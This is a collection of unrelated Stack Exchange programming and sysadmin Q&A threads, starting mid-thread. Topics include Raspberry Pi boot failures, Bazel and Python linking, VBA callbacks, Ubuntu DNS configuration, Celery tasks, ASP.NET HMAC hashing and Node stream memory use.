empty string (false statement). If you pick it up with the row or column example, it will return exactly what is in there. Let's say "A1" is true, "B1" is not, and "C1" is again true. Using "ABC" for "A1", "DEF" for "B1" and "GHI" for "C1", it will return "ABCGHI". I think this is what I am trying to do; however, I do not knwo the formula that would show the row if TRUE and leave it if it shows FALSE, and then, go on to the next row and not just adding the same row over and over. I have tried vlookup, offset, and if functions, and I a, doing something wrong. I updated my response to address your comment.
common-pile/stackexchange_filtered
Green LED blinks 4 times, did I brick my Pi? Out of nowhere my pi stopped booting. The red led lights up, they a long flash of the green led and then a cycle of 4 green blinks. HDMI screen shows nothing. I tried this with two different SD cards, the seconds one is brand new, flashed with vanilla "2013-09-25-wheezy-raspbian" this page says that 4 blinks mean "start.elf not launched" and that "If start.elf won't launch, it may be corrupt." but the image I'm using seems fine. I've also tried replacing start.elf with the one from github with the same result. Multimeter between tp1 and tp2 shows 4.91V tried setting hdmi_safe=1 in config.txt but nothing changed. Have I bricked my pi? what else can I try? Correct me if I'm wrong, but you probably haven't bricked it, but instead shorted it out, which may mean that you will need to buy another pi @zeldarulez That's very possible... but what could I have shorted out? what do I look for? which action of yours on pi brought it to this situation(if you tell we will not do that) i mean like drawing over current from pins or giving more power supply etc..and etc Try testing tp1 and tp2 for Ohms. If there is a short it will be 0ohm or very close it it. Has your problem been solved? If so, please create a self-answer (click the "Answer and paste in your solution.) We are working on a project to get the RPi SE up to par and it requires answers to be marked. For me, I was using an 256 GB SD, and it was too large. Everything worked again on the 32GB and 64GB SD cards I tried. The solution: go to the store I bought it, get a new board :) This is not Apple, this was just a configuration issue. Given the other answers available here, it would be really helpful if this was not marked as the accepted answer, as it would improve this question from a search optimization perspective. The answer to another question: Won't boot after removing and inserting the SD Card? That answer suggests that four green flashes indicates that that loader.bin failed to launch, rather than start.elf. Have you checked that for corruption? Have you read the question asked before posting your answer? For me the problem was caused by my removing of the line start_x=1 from /boot/config.txt file, and in my firmware there is the file /boot/start_x.elf and not /boot/start.elf. I solved removing the SD card, load it in an adapter and restore with my laptop the line in config.txt file. The problem is your sd card corrupted after doing some type of update to the system. Happened to me when i updated an addon then cancelled it. Just reformat it then reinstall the os. I don't think that you have bricked your Raspberry Pi, it's very resistive to misbehavior. I had this same behavior on one of my Raspberry Pi's. Do you use two different SD cards? If you do try an older image (before 2013-09-25). Also try the newest version. Are you using a Raspberry Pi made in UK? If you do it might have these problems you describe.vAre you using a Raspberry Pi with a Samsung or NOOBS SD card adapter? If so, it might have these problems you describe. I think the best way to fix this (without buying new stuff) is to find an image before 2013-09-25. You may find this post interesting. I don't see how using an older image would help, or why a Raspberry Pi made in the UK would be a problem... it makes sense, because I actually had extactly this problem, where a RPi from UK did not accept a SD card adapter, but a RPi make in China did. An older image is more like a try. 4 flashes means that loader.bin not launched This is what Chenmunka suggested in the top answer; do you have any additional information you could add to differentiate your answer?
common-pile/stackexchange_filtered
Ingest data from SQL Server using logstash - Batches or not and is "ORDER BY" in (SQL) statement required? We are load product-data using Logstash from SQL Server to Elastic Search. Our products have a ChangeId which is a number, sequentially increased on updates on the product-data. In our development process we sometimes 'change' all the records to reindex all data. I'm curious what the best way is to form the (SQL) statement. The underlying question is how much is handled by logstash or not. To give some context, here a little, siplified part of the pipeline use_column_value => true tracking_column => "ChangeId" statement => " SELECT * FROM [Uni].[TPProducts] WHERE [ChangeId] > :sql_last_value" lowercase_column_names => "false" When all, say 20.000.000 records are changed, this query will be heavy due to JSON generation in the [Uni].[TPProducts] view. I've these (somewhat open) questions: While running, we see growing the index and still the query active as process/session on SQL-server. This implies for me something is sort of streaming (which is desired). Maybe this is something related to the JDBC driver, but don't know how to find out the facts. The sql_last_value on disk is mostly not changed, while running, but one time we think we have seen the number was set to 1.000.000, while running. When we 'kill' the pipeline, data is ingested but the sql_last_value is not updated. Do we need to do an "order by" in this statement (ORDER BY [ChangeId]) or is this all managed by Logstash? Is working with batches (and consequently including the ORDER BY statement) a better approch for large sets?
common-pile/stackexchange_filtered
Can a JsonGenerator write to an OutputStream and Writer in the same call? Is there an elegant solution or pattern so that one invoke of writeStartObject() can be applied to both the Writer and the OutputStream? try ( JsonGenerator output = jfactory.createGenerator(outputWriter); // writer JsonGenerator cachingOutput = jfactory.createGenerator(cachingService.getCachingOutputStream(id));//outputstream ) { output.writeStartObject(); cachingOutput.writeStartObject(); ... I guess you can use the facade design pattern. But I think that is more overhead and does not bring much more readability. You may want to consider whether these two really should be bound together as there are cohesion and coupling guidelines to consider. For example, if you need to use the writer or the outputStream for other uses and to an extensive degree then you should keep them separate unless this extensive use is reflected across both of them equally. It may be better to hide both of these behind two independent Data Access Objects where their use can be compartmentalized, exposing their operations in a descriptive manner based on the purpose for accessing them - a little more suited to your business. Whether it's limited use or extensive use, for equal use across the pair I might apply a façade as such: class SimultaneousFeed { private JFactory jFactory; private JsonGenerator out; private JsonGenerator writer; SimultaneousFeed(JFactory jFactory, OutputStream outputStream, Writer outputWriter) { this.jFactory = jFactory; this.out = jfactory.createGenerator(outputStream); this.writer = jfactory.createGenerator(outputWriter); } void writeStartObject() { out.writeStartObject(); writer.writeStartObject(); } ... // other operations common to the pair of these outputs } ... SimultaneousFeed feed = new SimultaneousFeed(jFactory, cachingService.getCachingOutputStream(id), outputWriter); feed.writeStartObject(); Note that I'm passing the OutputStream to the new SimultaneousFeed instance rather than passing the id. Passing the id raises the data coupling in the new instance - the id is a piece of data the SimultaneousFeed should know nothing about. This allows the SimultaneousFeed to concern itself with only output data, improving reusability and maintainability. An alternative pattern to consider would be the Decorator pattern, provided you're able to subclass the class of the jfactory instance and the JsonGenerator class. This would allow you to create a custom JsonGenerator that simultaneously writes to the two outputs in an overridden implementation of the writeStartObject() method. In that case, you could provide a method in the jfactory class: public JsonGenerator createSimultaneousGenerator(OutputStream outputStream, Writer outputWriter) { return new SimulJsonGenerator(outputStream, outputWriter); }
common-pile/stackexchange_filtered
Should I drop a variable that has the same value in the whole column for building machine learning models? For instance, column x has 50 values and all of these values are the same. Is it a good idea to delete variables like these for building machine learning models? If so, how can I spot these variables in a large data set? I guess a formula/function might be required to do so. I am thinking of using nunique that can take account of the whole dataset. You should be deleting such columns because it will provide no extra information about how each data point is different from another. It's fine to leave the column for some machine learning models (due to the nature of how the algorithms work), like random forest, because this column will actually not be selected to split the data. To spot those, especially for categorical or nominal variables (with fixed number of possible values), you can count the occurrence of each unique value, and if the mode is larger than a certain threshold (say 95%), then you delete that column from your model. I personally will go through variables one by one if there aren't any so that I can fully understand each variable in the model, but the above systematic way is possible if the feature size is too large. Thanks! I am constructing something to identify them. My dataset has way too many variables...hard to go through them one by one.
common-pile/stackexchange_filtered
Compile C++ file with Python.h import using Bazel I want to compile a C++ file which uses Python embedding. Therefore I #include in my C++ source. When using g++ as compiler I would specify the following flags: g++ -o pybridge pybridge.cc -I/usr/include/python2.7/ -lpython2.7 I want to use Bazel for compilation now and tried the following target rule: cc_binary( name = "pybridge", srcs = ["pybridge.cc"], copts = ["-I/usr/include/python2.7/"], linkopts = ["-lpython2.7"] ) Running bazel build gives error messages like this: pybridge.cc:(.text+0x10): undefined reference to Py_Initialize Can you send the output of bazel -s to see the command? Also what happens if you build without sandboxing (--spawn_strategy=standalone)? Do you know where is the libpython2.7.so on the file system? Bazel executes your build in a sandbox, to prevent it from accessing random resources on your system that won't be present on, say, your coworker's system. This means that, unless you've declared a file (like the Python library) as a dependency, Bazel won't put it in the sandbox and your build won't be able to find it. There are two options: The easy one is to build with --spawn_strategy=standalone (bazel build --spawn_strategy=standalone :pybridge). This tells Bazel not to use sandboxing for this build. Note that, as far as Bazel knows, nothing has changed between the sandboxed and non-sandboxed run, so you'll have to clean before re-running without sandboxing, or you'll just get the cached error. The harder option is to declare /usr/lib/libpython2.7.so as an input to your build. If you want to do that, add the following to the WORKSPACE file: local_repository( name = "system_python", path = "/usr/lib/python2.7/config-x86_64-linux-gnu", # Figure out where it is on your system, this is where it is on mine build_file_content = """ cc_library( name = "my-python-lib", srcs = ["libpython2.7.so"], visibility = ["//visibility:public"], ) """, ) Then in your BUILD file, instead of linkopts = ["-lpython2.7"], add deps = ["@system_python//:my-python-lib"]. Then Bazel will understand that your build depends on libpython2.7.so (and include it in the sandbox). (Tried commenting on OP's post but I lack the required karma.) FWIW, I've had problems linking against Python 2.7's libraries (on Windows), even when I didn't use Bazel but ran the linker manually, so this problem may be unrelated to Bazel.
common-pile/stackexchange_filtered
Probability of ordered sequence There are 3 squares, 5 triangles, and 4 circles. I need to generate possibilities of certain sequences if they are randomly generated. What is the probability that all the squares are grouped, next all the triangles, then all the circles? What is the probability that all the shapes will be grouped together (all squares together, etc.) What is the probability that all the squares are grouped (everything else is random) I think the number of sequences for the second one is 3!5!4! = 17280 What you got is actually the number of possibilities for the first question. It's like having: 3S 2S 1S 5T 4T 3T 2T 1T 4C 3C 2C 1C S meaning square, T meaning triangle and C meaning circle. In the first slot, you have 3 possibilities (there are 3 squares), then there are 2 possibilities left for the second spot and so on. And the total number of possibilities without restriction is $(3+5+4)! = 12!$. Can you work out the probability for the first question with that? For the second question, it's very similar to the first, except that you can have triangles first, or circles first, meaning there are more possibilities. For this, you can treat each group as 1 unit. With this, you get 3 units: 1 set of squares, 1 for triangles and 1 for circles. The number of ways to arrange them becomes $3!$. Now, within each group, the shapes can be shuffled. For the squares: $3!$, for the triangles $5!$ and for the circles $4!$. This gives: $3!3!5!4!$. For the third question, you need to treat the squares as a single block. This gives you one big block for squares and 9 other shapes (5 being triangles and 4 being circles) for a total of 10 items. Thus, the number of ways you can arrange them is $10!$. On top of that, the squares can shuffle between themselves within the set of squares, so you get $3!$. The total number of ways hence is $10!3!$. Can you work out the respective probabilities?
common-pile/stackexchange_filtered
Custom callbacks in VBA Note the tag: VBA, not VB6, not VB.NET. This is specific to VBA in MS Access. I've built a collection of methods in an module I call "Enumerable". It does a lot of things reminiscent of the Enumerable classes and interfaces in .NET. One thing I want to implement is a ForEach method, analagous to the .NET Enumerable.Select method. I built a version that uses the Application.Run method to call a function for each element, but Application.Run only works with user-defined methods. For example, the following works: ' User-defined wrapper function: Public Function MyReplace( _ Expression As String, Find As String, StrReplace As String, _ Optional Start As Long = 1, _ Optional Count As Long = 1, _ Optional Compare As VbCompareMethod = vbBinaryCompare) MyReplace = Replace(Expression, Find, StrReplace, Start, Count, Compare) End Function ' Using Application.Run to call a method by name Public Sub RunTest() Debug.Print Run("MyReplace", "Input", "In", "Out") End Sub RunTest prints "Output", as expected. The following does NOT work: Debug.Print Run("Replace", "Input", "In", "Out") It throws run-time error 430: "Class does not support Automation or does not support expected interface". This is expected, because the documentation states that Application.Run only works for user-defined methods. VBA does have an AddressOf operator, but that only works when passing function pointers to external API functions; function pointers created using AddressOf are not consumable in VBA. Again, this is noted in the documentation (or see for example VBA - CallBacks = Few Cents Less Than A Dollar?). So is there any other way to identify and call a method using a variable? Or will my callback-ish attempts be limited to user-defined functions via the Application.Run method? You wont be able to use addressof, but VBA supports classes so interface based callbacks are fine; sub something(arg as string, myCallBack as IWhatever) ... myCallBack.call(...) Stuff your methods into a class and you can invoke them by name with "CallByName" - its a bit weak due to the handling of dynamic numbers of arguments, an alternative http://www.devx.com/tips/Tip/15422 I'm a little confused on what you actually need help with. Your first paragraph talks about implementing For...Each but the rest of your question talks about trying to use Application.Run on a VBA function. @mischab1 - Take a look at any of the .NET IEnumerable extension methods. In most of them you provide a callback to execute on each member of a collection. I'm trying to do the same thing in VBA. VBA does not have delegates or function pointers or anything. I've used Application.Run as a substitute, but it has limited applicability. No other answers in a week...for resolution's sake here's the best I could come up with: I built a helper module that resolves a ParamArray to individual arguments for the sake of calling CallByName. If you pass a ParamArray through to CallByName it will mash all the arguments into a single, actual Array and pass that to the first argument in the method you attempt to invoke. I built two ForEach methods: one that invokes Application.Run, and another that invokes CallByName. As noted in the question, Application.Run only works for user-defined global (public module) methods. In turn, CallByName only works on instance methods, and requires an object argument. That still leaves me without a way to directly invoke built-in global methods (such as Trim()) by name. My workaround for that is to build user-defined wrapper methods that just call the built-in global method, for example: Public Function FLeft( _ str As String, _ Length As Long) As String FLeft = Left(str, Length) End Function Public Function FLTrim( _ str As String) As String FLTrim = LTrim(str) End Function Public Function FRight( _ str As String, _ Length As Long) As String FRight = Right(str, Length) End Function ...etc... I can now use these to do things like: ' Trim all the strings in an array of strings trimmedArray = ForEachRun(rawArray, "FTrim") ' Use RegExp to replace stuff in all the elements of an array ' --> Remove periods that aren't between numbers Dim rx As New RegExp rx.Pattern = "(^|\D)\.(\D|$)" rx.Global = True resultArray = ForEachCallByName(inputArray, rx, "Replace", VbMethod, "$1 $2") You mean, FLTrim here trimmedArray = ForEachRun(rawArray, "FTrim")? @bonCodigo No, Trim and LTrim are separate VBA functions. In the top code I show example of the wrapper for LTrim, and the lower example I use the wrapper for Trim. I have a couple of alternative suggestions, would you still be interested in answers to the question? @Blackhawk, I just found this question via a search engine, so I guess it's safe to assume the answer is yes, someone will be interested @user357269 For an implementation of first class functions in VBA (as in, functions which can be stored in variables, passed to functions, and called anonymously), see this. Very old question but for those looking for a more general approach please use stdCallback and stdLambda alongside stdICallable. These can be found as part of the stdVBA library (a library largely maintained by myself). sub Main() 'Create an array Dim arr as stdArray set arr = stdArray.Create(1,2,3,4,5,6,7,8,9,10) 'Can also call CreateFromArray 'Demonstrating join, join will be used in most of the below functions Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10 Debug.Print arr.join("|") '1|2|3|4|5|6|7|8|9|10 'Basic operations arr.push 3 Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10,3 Debug.Print arr.pop() '3 Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10 Debug.Print arr.concat(stdArray.Create(11,12,13)).join '1,2,3,4,5,6,7,8,9,10,11,12,13 Debug.Print arr.join() '1,2,3,4,5,6,7,8,9,10 'concat doesn't mutate object Debug.Print arr.includes(3) 'True Debug.Print arr.includes(34) 'False 'More advanced behaviour when including callbacks! And VBA Lamdas!! Debug.Print arr.Map(stdLambda.Create("$1+1")).join '2,3,4,5,6,7,8,9,10,11 Debug.Print arr.Reduce(stdLambda.Create("$1+$2")) '55 ' I.E. Calculate the sum Debug.Print arr.Reduce(stdLambda.Create("Max($1,$2)")) '10 ' I.E. Calculate the maximum Debug.Print arr.Filter(stdLambda.Create("$1>=5")).join '5,6,7,8,9,10 'Execute property accessors with Lambda syntax Debug.Print arr.Map(stdLambda.Create("ThisWorkbook.Sheets($1)")) _ .Map(stdLambda.Create("$1.Name")).join(",") 'Sheet1,Sheet2,Sheet3,...,Sheet10 'Execute methods with lambdas and enumerate over enumeratable collections: Call stdEnumerator.Create(Application.Workbooks).forEach(stdLambda.Create("$1#Save") 'We even have if statement! With stdLambda.Create("if $1 then ""lisa"" else ""bart""") Debug.Print .Run(true) 'lisa Debug.Print .Run(false) 'bart End With 'Execute custom functions Debug.Print arr.Map(stdCallback.CreateFromModule("ModuleMain","CalcArea")).join '3.14159,12.56636,28.274309999999996,50.26544,78.53975,113.09723999999999,153.93791,201.06176,254.46879,314.159 'Creating from an object property Debug.Print arr.Map(stdCallback.CreateFromObjectProperty(arr,"item", vbGet)) '1,2,3,4,5,6,7,8,9,10 'Creating from an object method Debug.Print arr.Map(stdCallback.CreateFromObjectMethod(someObj,"getStuff")) End Sub Public Function CalcArea(ByVal radius as Double) as Double CalcArea = 3.14159*radius*radius End Function
common-pile/stackexchange_filtered
Euclidean tangent cone implies Riemannian manifold It is known that given a Riemannian manifold, then the tangent cone (as a metric space) at any point $p$ is isometric to the tangent space at $p$, with the metric given by the metric tensor. Is there a converse, or an additional condition to have a converse, in the following form? Given a metric space $X$ such that the tangent cone at any point is a Euclidean space of dimension $n$, and (possibly additional condition), then $X$ is a Riemannian manifold of dimension $n$. e.g., you may assume that $X$ has bounded curvature (since "at the end" it will). Then $X$ is a manifold by known theorems (see "Alexandrov spaces"). @valeri So is there an actual statement "A metric space with curvature bounded below is a Riemannian manifold iff its tangent cone is an Euclidean vector space"? note, that if $X$ has bounded (below and above here) curvature and no boundary, then you may have tangent cone=euclidean space for free. Then, if I remember correctly, yes, it was proved that Al.space with bounded curv is ($C^{1,\alpha}$ ?) manifold. Can not help with references though :( So, bounded curvature is a very strong condition, you might like smth else. According to Burago-Burago-Ivanov (see Theorem 10.10.13) The result @valeri mentioned is due to Nikolaev (the proof is not given, but a reference is given to V. Berestovskii and I. Nikolaev, Multidimensional generalized Riemannian spaces, in Geometry IV. Non-regular Riemannian geometry. Encyclopaedia of Mathematical Sciences, Springer-Verlag, Berlin, 1993, 165–244.) I also wonder if the issue is regularity. In Otsu and Shioya they have that an Alexandrov space such that the tangent cone is everywhere Euclidean is $C^0$-Riemannian (see Remark 3 on page 631). Note that the result of Nikolaev in my previous comment gives that the manifold has a $C^3$ atlas and the metric is $W^{2,p}$, so has better regularity. Let $X$ be any Riemannian manifold, and $x$ a point. Choose a sequence $(x_n)$ with $d(x_n,x)=2^{-n}$. Let $V_n$ be a subset contained in the ball of radius $2^{-2^{n}}$ around $x_n$. Then it is immediate that the tangent cone of $Y=X\smallsetminus \bigcup V_n$ at $x$ is the same as that of $(X,x)$. But (if every $V_n$ is nonempty), $Y$ is not a topological manifold at $X$. If moreover $V_n$ are chosen closed (e.g., the whole closed ball), $X$ is Riemannian at every other point, so every tangent space is isometric to a Euclidean space ("is a Euclidean space" is an ambiguous formulation) To provide some context the subsets of a Euclidean space that can be approximated by affine planes on every scale are known as Reifenberg-flat sets after E. R. Reifenberg who proved in the 1960s that such sets are bi-Holder to a Euclidean space. There is a substantial literature on the subject (search on "Reifenberg-flat"). Now regarding your specific question: T. Colding and A. Naber construct in Lower Ricci Curvature, Branching, and Bi-Lipschitz Structure of Uniform Reifenberg Spaces a metric space $Y$ such that The tangent cones of $Y$ are all isometric to $\mathbb R^n$ (which by an earlier work of J. Cheeger and Colding implies that $Y$ is bi-Holder homeomorphic to $\mathbb R^n$). Every bounded set of $Y$ is bi-Lipschitz embeddable in some Euclidean space. There is no homeomorphism of $Y$ onto $\mathbb R^n$ such that the pullback geometry is induced by some $C^{0,\beta}$ Riemannian metric where $0<\beta<1$. To show (3) they prove that geodesic in $Y$ branch in the sense of Theorem 1.3 of the linked paper. Moreover, $Y$ occurs ``in nature'' as a pointed Gromov-Hausdorff limit of a noncollapsing sequence of Riemannian $n$-manifolds with a common lower bound on Ricci curvature. I am not sure whether the metric on $Y$ can be induced by a $C^0$ Riemannian metric but in any case branching of geodesics is not the property a decent $C^0$ metric should be proud of.
common-pile/stackexchange_filtered
Analyze nodejs memory with and without stream API node v14.17.0 I try to test memory consumption with and without the use of a streams. The main goal is to find a metric that will show clearly the benefits of using stream. Currently the results look the same: TEST #1: read file without stream test('read file without stream and upload to s3', async () => { const fileContent = fs.readFileSync(path.join(__dirname, './benda.js'), 'utf8'); await _uploadFile(`${FILE_NAME}`, bucket, fileContent); const used = process.memoryUsage(); for (let key in used) { console.log(`${key} ${Math.round(used[key] / 1024 / 1024 * 100) / 100} MB`); } }) result #1: rss 1541.91 MB heapTotal 538.3 MB heapUsed 535.07 MB external 482.39 MB arrayBuffers 0.1 MB TEST #2: create read stream and upload to s3 test('create read stream and upload to s3', async () => { const readStream = fs.createReadStream(path.join(__dirname, './benda.js')); await _uploadFile(`${FILE_NAME}`, bucket, readStream); const used = process.memoryUsage(); for (let key in used) { console.log(`${key} ${Math.round(used[key] / 1024 / 1024 * 100) / 100} MB`); } }); const _uploadFile = async(fileName, bucket, streamOrContent) => { const command = new PutObjectCommand({ Bucket: bucket, Key: fileName, Body: streamOrContent }); const res:PutObjectCommandOutput = await s3Client.send(command); return res; }; result #2: rss 1543.93 MB heapTotal 539.8 MB heapUsed 536.39 MB external 485.05 MB arrayBuffers 3.39 MB It seems pretty the same, the file size is ~504MB Please let me know what I'm missing here? or my test is wrong? Why would you think that reading a file from a local disk is the same operation as uploading a file to s3 and therefore should use the same amount of temporal memory? These are vastly different code paths, implemented completely differently. It's a no wonder they might use a different amount of memory to accomplish their job. Thanks for the comment, I updated the question by uploading the file to s3 on test #1 too. still getting the same result. Do you have a better use-case to test memory usage? What problem are you trying to solve here? You have measured that two different code paths (one using a stream, the other reading the whole file into memory) happen to use a slightly different amount of memory in one specific test. This is not surprising in the least. Is there an actual problem here? All this memory usage should only be temporal too so as soon as you aren't using those variables any more and the operation is done, the garbage collector will reclaim that memory as available for reuse by future Javascript allocations. I'm going to load large amounts of data from different types of databases. My goal is to reduce the load on the servers, and I thought that one of the ways is to use streaming instead of loading huge files into memory Streaming loads data in chunks rather than load the whole thing into memory so if all else is equal, streaming may have lower peak memory usage. But, a 2MB file size is practically noise in these measurements (only 2% of the heap) and may be countered by additional usage by the streaming mechanism. Try it with a 2GB file and the difference will much more obvious. I updated my test to use file size is ~504MB. Still same result. Maybe there is another metric that will show clearly the benefits of using stream?
common-pile/stackexchange_filtered
How to pass File in electron contextBridge I could not find the docs on electron contextBridge and what is done to the API arguments but obviously something is done. This is the gist of it: // preload.js contextBridge.exposeInMainWorld('fileCache', { put (file) { console.log(file) // ==> {} } }) // web app window.fileCache.put(new File([], 'foo.txt')) How should I pass File or any Blob or Buffer argument ? (making a string is not an option for performance reasons: 20+ Mb files...) Closest ref I have found: https://github.com/electron/electron/blob/master/spec-main/api-context-bridge-spec.ts URL.createObjectURL(file) ==> fetch(url) works
common-pile/stackexchange_filtered
How to configure DNS servers manually on Ubuntu server via bash? I still want to use DHCP to obtain IP4 and IP6 addresses. DHCP delivers DNS servers I want that the DNS servers from DHCP are ignored and two servers I specify manually are used instead. Must be done on a headless server (no GUI) via Bash. ubuntu-14.04.2-server-amd64, standard minimal installation + sshd How is this configured correctly? How to verify that the configuration works as expected? /etc/network/interfaces is: # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback # The primary network interface auto em1 iface em1 inet dhcp resolvconf is installed. Can you use vi to edit /etc/network/interfaces and add your own DNS server entries? Yes, I could do that. What should I put there? How does it interact with resolv.conf? Add dns-nameservers <your DNS server IPs> to the end of your interfaces file and reboot the server... this should add the required DNS servers to the network config... There is some documentation at https://help.ubuntu.com/lts/serverguide/network-configuration.html, but it doesn't help me (no enough details about how to write the "stanza"s and what effect they have). Can you expand on the last comment? You shouldn't need to put < and > - this was my way of saying "this is where you type your DNS server IPs". For example: dns-nameservers <IP_ADDRESS> <IP_ADDRESS> to add Google's primary and secondary DNS addresses. @Big Chris: sorry, didn't see your comment when I wrote mine. @Big Chris: Your proposal seems not to work. I did the change. The content of resolv.conf did not change. I did ifdown em1: resolv.conf has no more DNS servers. I did ifup em1: resolv.conf gets again DNS from DHCP, not those configured in interfaces. Accidentally clicked to start a chat conversation... sorry! This answer may help with additional options to try: http://askubuntu.com/questions/130452/how-do-i-add-a-dns-server-via-resolv-conf I tried to use /etc/dhcp/dhclient.conf: prepend domain-name-servers, but it doesn't work. "Adding" name server entries is not what I want. The interfaces approach possibly only works with "static" and not with "dhcp". Try using supersede domain-name-servers rather than prepend - as seen http://unix.stackexchange.com/questions/146463/specifying-dns-settings-to-override-those-of-dhcp Both supersede and prepend do not work. /etc/resolv.conf still has the two servers from DHCP after a reboot. Have a read of this (https://raam.org/2009/configuring-static-dns-with-dhcp-on-debianubuntu/)... we might be getting the wrong file... Thanks, I got an syntax error into resolv.conf, now supersede works! I still cannot guess the correct syntax for supersede to add two nameservers. Separated by blank provoces a syntax error. separate the two IPs with a comma :) e.g. supersede domain-name-servers <IP_ADDRESS>, <IP_ADDRESS>; Add the line supersede domain-name-servers <IP_ADDRESS>, <IP_ADDRESS>; to the DHCP client configuration file /etc/dhcp/dhclient.conf. To verify get the names of your network interfaces with ifconfig, shut down the interface(s) with ifdown ifname (e.g. ifdown eth0), restart it with ifup ifname (e.g. ifup eth0). After that (or after a reboot) /etc/resolv.conf should contain the two lines nameserver <IP_ADDRESS> nameserver <IP_ADDRESS> Thanks to Big Chris.
common-pile/stackexchange_filtered
celery issuing tasks from subtasks My "big" task works in steps: it can either terminate or spawn more tasks. In my example, I count to 5. from celery import Celery app = Celery('tasks', broker='redis://localhost:6379/0') from time import sleep @app.task def slow_add(x): """Slowly counts to 5""" sleep(1) print (x) if x == 5: return x else: return slow_add.s(x+1)() When I schedule the task, I get only one invocation: In [48]: asks.slow_add.run(1) 1 2 3 4 5 Out[48]: 5 How to call it asynchronously? I tried different variations of apply_async, delay, but no avail. I see no tasks in the celery monitor. Why? How can I get intermediate state (in this case, the number between 1 and 5) while the task is asynchronously executing? In My example, @app.task def test(x): import time time.sleep(1) print x if x == 5: return x else: return test.delay(x+1) It works fine asynchronously when I used res = test.delay(1) In Celery monitor I can see task received Received task: services.tasker.test[67f22e02-7c39-4c1d-a646-acabeb72d208]1 Received task: services.tasker.test[9eed6d45-4931-4790-8477-3bbe75e213e4] Task services.tasker.test[67f22e02-7c39-4c1d-a646-acabeb72d208] succeeded in 3.021544273s: None2... You can get task state using res.ready(), it returns True when the task is finished otherwise it returns False In my test case, the result are like >>> res = test.delay(1) >>> res.ready() # before finishing task False >>> res.ready() # after finishing task True or def final_result(r): if isinstance(r.result, celery.result.AsyncResult): return final_result(r.result) else: return r.result and use above like >>> print final_result(res) 5 In this case I cannot get the result of the original command. I.e. it is complete after 1 second, but how do I get the 5? No, I badly phrased the question. The task completes after 1 iteration; celery just spawns a new one without linking to the parent one. How do I get the async handler of the last task? In other words, your example really does what I asked: creates 5 tasks. But in the end I am only interested in the result of the last one (which I can get if I have the handle).
common-pile/stackexchange_filtered
How to import the Cryptographic library in ASP.NET Core I have the following drawback, it turns out that in my code I have the following: private void CreatePasswordCreate(string password, out byte[] passwordCreate, out byte[] passwordRepeat) { using (var hmac = new System.Security.Cryptography.HMACSHA512()) { passwordCreate = hmac.Key; passwordRepeat = hmac.ComputeHash(System.Text.Encoding.UTF8.GetBytes(password)); } } but when writing it I get the following error: CS0234: The type or namespace name 'Security' does not exist in the namespace 'System.Invoices.System' (are you missing an assembly reference?) What was previously shown appears to me in the following line of code specifically in the word 'Security' using (var hmac = new System.Security.Crytography.HMACSHA512()) and I also get the following error: CS0234: The type or namespace name 'Text' does not exist in the namespace 'System.Invoices.System' (are you missing an assembly reference?) I get this error in the following line of code: passwordRepeat = hmac.ComputeHash(System.Text.Encoding.UTF8.GetBytes(password)); I do not know how to import this library since I am a newbie in this, I would like to know how to add this library or what content the class 'Security' and 'Text' should have, and where it should go is it created since it does not appear automatically added in it using System Are you familiar with nuget? Being a newbie is no shame; but I wouldn't start with security- related development. Yes, but if I do not start now, when? If not, I will never learn, I go here for solutions, not for them to return me to the beginning, a help would not teach me a bad practice I already solved the error I had with the following instead of the code that had the solution is this private void CreatePasswordCreate(string password, out byte[] passwordCreate, out byte[] passwordRepeat) { using (var hmac = new Security.Cryptography.HMACSHA512()) { passwordRepeat = hmac.Key; passwordCreate = hmac.ComputeHash(Encoding.UTF8.GetBytes(password)); } } and then make the call of the function that was created before the assignment of the variables in the following way CreatePasswordCreate(model.password,out byte[] passwordCreate, out byte[] passwordRepeat ); and importing using System.Text; however it also works in the following way, adding the system in Cryptography private void CreatePasswordCreate(string password, out byte[] passwordCreate, out byte[] passwordRepeat) { using (var hmac = new System.Security.Cryptography.HMACSHA512()) { passwordRepeat = hmac.Key; passwordCreate = hmac.ComputeHash(Encoding.UTF8.GetBytes(password)); } }
common-pile/stackexchange_filtered
Using python to access JAVA API? I have written a python scripts which get data from various sources(Quandl, webscraping etc) at the moment. I want to switch to a more stable information feed, order placement system. The broker provides an API: https://www.sharekhan.com/active-trader/oalert/new-to-oalert After looking through the docs and the scant information available it seems I can only use it with java. I am new-ish to python and have never tried java. Can someone point me in the direction of where to begin learning more about how to use the API in my python program/script? From the FAQ TradeTiger API has a Transmission Control Protocol (TCP)-based architecture. So, it can work in any programming language that can communicate using the TCP protocol. Some programming languages that are compatible with the API are C#.net, VB.Net, Java, Python, C++ and VB. Thanks Unless your Python code runs under something like Jython, you can't use Java APIs from Python. Either you'll need a proper Python library that implements the API (which your quote from the FAQ suggests they supply), or there is an HTTP-based API that can be accessed via any language that supports HTTP requests. @chepner While an HTTP-based API would be ideal, python can also work at the lower level of any generic TCP-based API. The architecture may use TCP, but that doesn't mean it's a detail exposed at the API level. (Granted, it doesn't make a lot of sense to be listing languages that can support TCP communication.) @chepner A quick glance at the documentation at https://www.sharekhan.com/Upload/General/TradeTigerAPIForClient.pdf shows that the API seems to be pure TCP with no sugary HTTP on top of it. According the the quote you gave from the documentation, the API uses TCP. You can access this with any networking library in any language, including Python. To start, you will need to learn the basics of TCP. A google search will lead you to the technical documentation. An RFC gives the official specification. Then you will need a Python library to open a network connection and send binary data. Finally, you will need to read the documentation for the API. Thanks, can you point me to some resource where I can start reading/learning how to go about it? @Sid You should start by learning the basics of TCP. A google search should point you to the technical documentation. Then read the API docuentation at https://www.sharekhan.com/Upload/General/TradeTigerAPIForClient.pdf and find a TCP library for python to implement the requests.
common-pile/stackexchange_filtered
